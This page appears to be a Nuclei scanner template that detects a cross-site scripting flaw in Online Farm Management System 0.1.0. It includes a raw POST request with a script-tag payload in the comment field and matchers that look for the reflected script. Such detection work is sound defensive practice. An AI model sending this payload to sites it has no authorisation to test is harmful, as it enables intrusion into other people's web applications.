Skip to content

Online Farm Management System 0.1.0 - Cross-Site Scripting

ID: onlinefarm-management-xss

Severity: high

Author: arafatansari

Tags: onlinefarm,cms,xss,edb

Online Farm Management System 0.1.0 contains a cross-site scripting vulnerability via the review.php file.

id: onlinefarm-management-xss
info:
name: Online Farm Management System 0.1.0 - Cross-Site Scripting
author: arafatansari
severity: high
description: |
Online Farm Management System 0.1.0 contains a cross-site scripting vulnerability via the review.php file.
reference:
- https://www.exploit-db.com/exploits/48673
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
tags: onlinefarm,cms,xss,edb
http:
- raw:
- |
POST /reviewInput.php?pid=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
comment=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&rating=0
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<em style="color: black;"><script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a004830460221008efece8f10e5699608496b47d958029f766848a64b0b54a269c2069cb623d63e022100abc24000affa4ba3353a822acc509e63996195c1451957339d316c2995dec4ac:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/onlinefarm-management-xss.yaml"

View on Github